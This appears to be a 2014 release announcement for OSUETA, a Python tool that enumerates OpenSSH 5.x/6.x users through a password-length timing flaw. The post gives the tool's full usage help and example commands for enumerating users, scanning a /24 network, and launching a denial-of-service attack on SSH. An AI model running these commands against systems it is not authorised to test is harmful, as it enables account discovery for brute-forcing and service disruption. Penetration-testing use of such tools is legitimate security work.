Published on July 16th, 2014 📆 | 6606 Views ⚑0
OSUETA -OpenSSH User Enumeration Timing Attack Released
OSUETA stands for OpenSSH User Enumeration Timing Attack and is a small script written in Python to exploit a bug present in versions 5 . * and 6. * of OpenSSH . In these versions during the authentication process, you may obtain a list of users in the system discriminated by the time it takes the system to evaluate an arbitrarily long password.
If the user is present, the time it takes the server to respond is larger. For example, to allow users found present in a system , this tool can be useful in penetration testing to shorten in brute force. The script also has the ability to establish a Denial of Service attack in the ssh service.
osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE] [-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH] [-c VERS] [--dos DOS] [-t THREADS]
OpenSSH User Enumeration Time-Based Attack Python script
optional arguments: -h, --help show this help message and exit -H HOST Host Ip or CIDR netblock. -k HFILE Host list in a file. -f FQDN FQDN to attack. -p PORT Host port. -L UFILE Username list file. -U USER Only use a single username. -d DELAY Time delay fixed in seconds. If not, delay time is calculated. -v VARI Make variations of the username (default yes). -o OUTP Output file with positive results. -l LENGTH Length of the password in characters (x1000) (default 40). -c VERS Check or not the OpenSSH version (default yes). --dos DOS Try to make a DOS attack (default no). -t THREADS Threads for the DOS attack (default 5).
* A single user enumeration attempt with username variations: ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes * A single user enumeration attempt with no user variations a dos attack: ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes * Scanning a C class network with only one user: ./osueta -H 192.168.1.0/24 -p 22 -U root -v no * Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters: ./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50